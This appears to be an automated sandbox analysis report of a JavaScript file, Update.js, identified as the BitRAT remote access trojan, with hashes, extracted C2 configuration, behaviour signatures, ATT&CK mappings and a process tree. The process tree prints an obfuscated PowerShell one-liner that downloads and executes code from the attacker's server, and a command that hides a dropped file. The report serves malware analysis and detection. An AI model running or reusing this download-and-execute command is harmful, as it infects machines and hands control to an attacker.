Overview

overview

10

Static

static

1

Update.js

windows11-21h2-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-04-2024 15:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Update.js

  • Size

    439KB

  • MD5

    7125357715f688577910416555a1997a

  • SHA1

    494f4befa879ac5174ddfd2c0f0ff0c711251eb8

  • SHA256

    8fe424869272394512941904c4b1ba7039ac2a514acb9861e613f5e85222d9a7

  • SHA512

    05cc9f9e6046866090395624cee673439ec4cd896fd3c24010a209ab54789ab9e93b45907b403aeb04fd7d8a50cbe35eed2e9c80847cd1f2cc51785ad4a4f294

  • SSDEEP

    1536:TBEEBEEBEPZBEwBEkBEGZBEiZBEGZBEGZBEG5+BEVBYBEG+BEVB/+BEBBEG+BEVq:6

Score
10/10
bitratpersistencetrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://77.221.151.31/a/z.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://77.221.151.31/a/s.png

Extracted

Family

bitrat

Version

1.38

C2

77.221.151.31:4444

Attributes
  • communication_password

    7b13ff385b95cf25d53088d6b7c5d890

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • Blocklisted process makes network request 2 IoCs
  • UPX packed file 50 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4660
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\attrib.exe
          attrib +h C:\Users\Public\0x.log
          4⤵
          • Views/modifies file attributes
          PID:392
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:4040
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2060
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
            PID:4076

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      1
      T1112

      Hide Artifacts

      1
      T1564

      Hidden Files and Directories

      1
      T1564.001

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        5f4c933102a824f41e258078e34165a7

        SHA1

        d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

        SHA256

        d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

        SHA512

        a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        9b9c200437ca6453c1a7a66285ebbc98

        SHA1

        238f1e7629bc0c371ba4fa3f0bb335302b21d909

        SHA256

        e98bf0b04cdec1745689b16cccbae66f1ad977f178968736dbfc9a8f0f08c5ff

        SHA512

        12c183cb8b99867d85a982066629267ce110dccc455a8a62bb1d9175db84aa603ba9a18b7e3fed99d84e94ccffe78af284f7743df46753057bcaefda94c55926

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4kghkgs.mvm.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Public\0x.log
        Filesize

        62KB

        MD5

        d2e9de8671fd61605ff5f8b8f3249d6b

        SHA1

        38dc0accb9c561c4f2ed9cc565f73a09eb84e81c

        SHA256

        fcdaa801a02c05faa8e09a1abb75ab4b8b4a57e1d097cc5feb63b95280230e5c

        SHA512

        413abbf5eb1a19fec41bbf31cfa524a8c88f049ae624c2b8f8cd40b3dc6ca37b99a45e74cfcb3422bee104e218ebc6b3d38f22b5b9afbd967545aa862b15a106

        Download Submit
      • memory/888-29-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/888-19-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/888-20-0x000001A174AD0000-0x000001A174AE0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/888-21-0x000001A174AD0000-0x000001A174AE0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/888-24-0x000001A175230000-0x000001A17523E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/2060-54-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-59-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-101-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-99-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-97-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-33-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-34-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-35-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-95-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-94-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-39-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-41-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-93-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-91-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-43-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-44-0x0000000074570000-0x00000000745AC000-memory.dmp
        Filesize

        240KB

        Download
      • memory/2060-45-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-46-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-47-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-48-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-49-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-50-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-51-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-52-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-53-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-90-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-55-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-57-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-58-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-89-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-61-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-60-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-62-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-63-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-64-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-65-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-66-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-67-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-68-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-69-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-70-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-72-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-74-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-75-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-77-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-79-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-81-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-83-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-85-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-86-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/2060-87-0x0000000000400000-0x00000000007D3000-memory.dmp
        Filesize

        3.8MB

        Download
      • memory/4076-25-0x0000000000400000-0x000000000044E000-memory.dmp
        Filesize

        312KB

        Download
      • memory/4076-42-0x0000000000400000-0x000000000044E000-memory.dmp
        Filesize

        312KB

        Download
      • memory/4076-31-0x0000000000400000-0x000000000044E000-memory.dmp
        Filesize

        312KB

        Download
      • memory/4076-30-0x0000000000400000-0x000000000044E000-memory.dmp
        Filesize

        312KB

        Download
      • memory/4660-8-0x000001C72A820000-0x000001C72A842000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4660-40-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4660-17-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4660-18-0x000001C742CB0000-0x000001C742CC0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4660-22-0x000001C742CB0000-0x000001C742CC0000-memory.dmp
        Filesize

        64KB

        Download